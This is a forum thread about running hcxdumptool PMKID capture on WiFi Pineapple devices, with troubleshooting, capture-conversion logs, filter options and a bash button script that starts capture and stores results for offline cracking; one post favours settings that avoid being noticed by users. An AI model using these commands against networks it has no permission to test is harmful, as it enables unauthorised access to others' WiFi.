Jump to content

PMKID Attack on WiFi Pineapples

Zylla

By Zylla
in WiFi Pineapple NANO

Recommended Posts

  • Replies 216
  • Created
  • Last Reply
Zylla Newbie

Zylla

Posted
  • Author
Posted
1 hour ago, g0blin said:

Sorry @Zylla - scratch that. It does appear to be working, but I may need to adjust how I'm parsing the logs in order to marry up captures with APs. Stand down! ?

Phew. I know the last update from ZerBea fixed some bugs with direct probe-request handling. So i got worried something was wrong on my part. ?
Glad to hear everything's good! ?

Link to comment
Share on other sites
cheeto Newbie

cheeto

Posted
Posted
18 hours ago, Zylla said:

Kali is based on Debian, the only "modified versions" I can think of is the images you can download containing the Nexmon patches, making you able to run wlan0 in monitor-mode (and AP mode at the same time) 

But that's just a kernel patch. 

Here's link for a great version: https://re4son-kernel.com/re4son-pi-kernel/

And yeah, same with the Pineapple. You don't use hashcat on these devices to crack the PMKID, you transfer the captures from the device to your desktop which hopefully has a GPU or something ?

Yes, the one I have on my RP3b+ is an image version.  The link you sent me doesn't seem to be an image file.   I'm going to do some reading up on how to install it.

Have you tried getting PMKID on Rasberrian?

thank you!

Link to comment
Share on other sites
Zylla Newbie

Zylla

Posted
  • Author
Posted
9 hours ago, cheeto said:

Yes, the one I have on my RP3b+ is an image version.  The link you sent me doesn't seem to be an image file.   I'm going to do some reading up on how to install it.

Have you tried getting PMKID on Rasberrian?

thank you!

Haven't tested it, but since Raspberrien is also based on Debian I don't see any reasons for it to not work if you have all the dependencies installed. But you would need to patch the kernel to get monitor-mode on wlan0. 

Link to comment
Share on other sites
Just_a_User Newbie

Just_a_User

Posted
Posted
3 minutes ago, kbeflo said:

@Zylla, @g0blin, is there a way to whitelist access points from getting deauth by hcxdumptool? For example the Pineapple's mgmt ap and controller.

Hi @kbeflo you can whitelist with the filters from cli - I havent used whitlist/protection mode but have tried blacklist/target and works well. 

--filterlist=<file>                : mac filter list
                                     format: 112233445566 + comment
                                     maximum line lenght 128, maximum entries 32
--filtermode=<digit>               : mode for filter list
                                     1: use filter list as protection list (default)
                                     2: use filter list as target list

 

Link to comment
Share on other sites
g0blin Newbie

g0blin

Posted
Posted

I've updated the module to 0.2, this includes a few new features.

* Scan for APs using airodump, instead of relying upon output of hcxdumptool to discover APs
* Provide "inclusion" list in order to target specific APs (there you go @Just_a_User!)
* Retain various pieces of scan data, including the capture, log and AP list from scans
* Improved dependency script (thanks @Zylla!)

I've a bit of cleaning up to do, as it's gotten a little out of hand. I'd like to unify the API methods for loading scan/capture data, as well as get myself up to speed on Angular so that I can use its features a bit more optimally, but for the moment the module should work as intended.

Link to comment
Share on other sites
Just_a_User Newbie

Just_a_User

Posted
Posted
46 minutes ago, g0blin said:

* Provide "inclusion" list in order to target specific APs (there you go

? that's great, thank you. there may be occasions where the inverse may be required. protecting the Pineapples management AP and targeting all others.

Any chance you can make the inclusion target or exclusion protection modes switchable by user? if not no worries.

I will give this a test drive later for sure. thank you for the contribution

EDIT - I just installed it the targeted allows you to avoid your management network so no need .this is great! thanks again

EDIT EDIT ? i get an error on converting

Selection_032.png

Selection_033.png

Selection_034.png

Link to comment
Share on other sites
g0blin Newbie

g0blin

Posted
Posted

D'oh - sorry! I'll get on fixing that after this mornings round of meetings!

edit: Hmm, I tried to convert a saved capture from yesterday and it appeared to work. I'm at work and only have 5ghz networks here, so will need to investigate further when I get home this evening.

As for inverting the inclusion rule, that's something I can cover off this evening also.

Link to comment
Share on other sites
Just_a_User Newbie

Just_a_User

Posted
Posted
2 hours ago, g0blin said:

As for inverting the inclusion rule, that's something I can cover off this evening also. 

Super nice ? finishing touches (for me at least) would be a delete button for selected log and maybe a download converted file - next to load and convert.

It could be the download happens after the convert?, if so that's great. I just cant see that yet with my error.

I have to factory reset my tetra soon as i have been messing a lot with lib's recently so might be causing this issue myself.

EDIT - i just managed a conversion, which does indeed pop up as a download. I can repeat the error on one log file so its something in there. I will have a better poke about and report back.

Link to comment
Share on other sites
g0blin Newbie

g0blin

Posted
Posted
25 minutes ago, Just_a_User said:

Super nice ? finishing touches (for me at least) would be a delete button for selected log and maybe a download converted file - next to load and convert.

It could be the download happens after the convert?, if so that's great. I just cant see that yet with my error.

I have to factory reset my tetra soon as i have been messing a lot with lib's recently so might be causing this issue myself.

Great, thank you for the feedback! I'll try to get these features in this evening, as well as diagnosing the issue you found with downloading the converted results.

Link to comment
Share on other sites
Just_a_User Newbie

Just_a_User

Posted
Posted
14 minutes ago, g0blin said:

Great, thank you for the feedback! I'll try to get these features in this evening, as well as diagnosing the issue you found with downloading the converted results.

I think i might have it (at least in part), I can repeat it if i try and convert an empty log file, so my guess is the log i tried to convert is possibly empty even though shows up green/powned.

Link to comment
Share on other sites
g0blin Newbie

g0blin

Posted
Posted

Interesting! I'll see if I can reproduce it locally. If I can't I may have to ask you to send over any (redacted) logs that you're able to, if you're willing? If not no problem - I can always step through it and try to spot where I've messed up.

Thanks

Link to comment
Share on other sites
Just_a_User Newbie

Just_a_User

Posted
Posted
2 hours ago, g0blin said:

Interesting! I'll see if I can reproduce it locally. If I can't I may have to ask you to send over any (redacted) logs that you're able to, if you're willing? If not no problem - I can always step through it and try to spot where I've messed up.

Thanks

I had removed the logs and files from /tmp/ before i saw your request.

I have since had 2x log files with no marked powned networks, both were targeting my test AP,, one runs ok the other JSON erros - the only difference i can see is if it contains a PMKID or not.

This one JSON's errors. 

root@Pineapple:/pineapple/modules/PMKID/capture# hcxpcaptool -z test.16800 capture_
1536756737
start reading from capture_1536756737
                                                
summary:                                        
--------
file name....................: capture_1536756737
file type....................: pcapng 1.0
file hardware information....: mips
file os information..........: Linux 3.18.84
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: big endian
read errors..................: flawless
packets inside...............: 45
skipped packets..............: 0
packets with FCS.............: 45
beacons (with ESSID inside)..: 18
probe requests...............: 2
probe responses..............: 5
authentications (OPEN SYSTEM): 14
authentications (BROADCOM)...: 1
EAPOL packets................: 5
EAPOL PMKIDs.................: 1

0 PMKID(s) written to test.16800
root@Pineapple:/pineapple/modules/PMKID/capture#

 

This one works fine 

root@Pineapple:/pineapple/modules/PMKID/capture# hcxpcaptool -z test2.16800 capture
_1536756628 
start reading from capture_1536756628
                                                
summary:                                        
--------
file name....................: capture_1536756628
file type....................: pcapng 1.0
file hardware information....: mips
file os information..........: Linux 3.18.84
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: big endian
read errors..................: flawless
packets inside...............: 48
skipped packets..............: 0
packets with FCS.............: 48
beacons (with ESSID inside)..: 13
probe requests...............: 2
probe responses..............: 4
association requests.........: 3
association responses........: 1
authentications (OPEN SYSTEM): 19
authentications (BROADCOM)...: 2
EAPOL packets................: 5
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test2.16800
root@Pineapple:/pineapple/modules/PMKID/capture#

I got to do some stuff so wont be able to look at it again for a few hours. maybe this gives some clues?

 

 

Link to comment
Share on other sites
g0blin Newbie

g0blin

Posted
Posted
3 hours ago, Just_a_User said:

I had removed the logs and files from /tmp/ before i saw your request.

I have since had 2x log files with no marked powned networks, both were targeting my test AP,, one runs ok the other JSON erros - the only difference i can see is if it contains a PMKID or not.

 

Thanks, that gives me plenty to go on! I'm currently packing to move house, so won't be checking this out until later this evening. I'll keep you updated ?

At a guess, if no PMKIDs are written, perhaps the file does not get created. That'd explain why the Pineapple API is complaining about the file being invalid, however I suppose in this case we should at least return an empty file.

Link to comment
Share on other sites
PixL Newbie

PixL

Posted
Posted
14 minutes ago, g0blin said:

Sorry, real life has gotten in the way so a bit behind with the updates. Will try and get some time to work on this tonight ?

Is it possible to have a "save settings option" to remember the command line options for next time?  I like to use --disable_deauthentications --disable_disassociations as correct me if I am wrong disconnecting clients is not needed to capture PMKIDs and simply leads to being noticed by users.

Link to comment
Share on other sites
g0blin Newbie

g0blin

Posted
Posted
38 minutes ago, PixL said:

Is it possible to have a "save settings option" to remember the command line options for next time?  I like to use --disable_deauthentications --disable_disassociations as correct me if I am wrong disconnecting clients is not needed to capture PMKIDs and simply leads to being noticed by users.

Sure thing, I can see about adding that in the next version - nice suggestion!

Link to comment
Share on other sites
PixL Newbie

PixL

Posted
Posted

I have also updated my simple button script so that it stores captured data to /pineapple/modules/PMKID/capture, you can then use g0blin's module to view the data. 

#!/bin/bash
#PixL
file="/tmp/handshake"
capture="`head -30 /dev/urandom | tr -dc "0123456789" | head -c3`"
if [ -f "$file" ]
then
        killall hcxdumptool
        led YELLOW off
        rm -rf /tmp/handshake
        hcxpcaptool -z test.16800 test.pcapng > test.conlog
        mv test.pcapng /pineapple/modules/PMKID/capture/$capture
        mv test.16800 /pineapple/modules/PMKID/capture/$capture.16800
        mv test.conlog /pineapple/modules/PMKID/capture/$capture.conlog
        mv test.log /pineapple/modules/PMKID/capture/$capture.log

else
        touch /tmp/handshake
        led YELLOW on
        hcxdumptool -o test.pcapng -t 2 -i wlan1mon --enable_status=3 --disable_deauthentications --disable_disassociations > test.log &
fi

 

Link to comment
Share on other sites
  • 2 weeks later...
Arch Newbie

Arch

Posted
Posted

I've been having some trouble installing the ipk files on my NANO.  Looks like they may be corrupt or otherwise.  

root@Pineapple:/sd# opkg --dest sd install hcxdump*.ipk
Collected errors:
 * deb_extract: hcxdumptool_4.2.1-12_ar71xx.ipk: invalid magic
 * pkg_init_from_file: Failed to extract control file from hcxdumptool_4.2.1-12_ar71xx.ipk.

Is there a version I should try to download and install?

 

Thanks

Link to comment
Share on other sites
Zylla Newbie

Zylla

Posted
  • Author
Posted
13 hours ago, Arch said:

I've been having some trouble installing the ipk files on my NANO.  Looks like they may be corrupt or otherwise.  


root@Pineapple:/sd# opkg --dest sd install hcxdump*.ipk
Collected errors:
 * deb_extract: hcxdumptool_4.2.1-12_ar71xx.ipk: invalid magic
 * pkg_init_from_file: Failed to extract control file from hcxdumptool_4.2.1-12_ar71xx.ipk.

Is there a version I should try to download and install?

 

Thanks

The NANO always gives some "errors" when trying to install IPK's about missing. control files etc. Which usually can be safely ignored. First try seeing if you can locate the binary on the SD-card, and then try to simply launch it.

To locate it, do this: "find /sd -name hcxdumptool" 

 

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...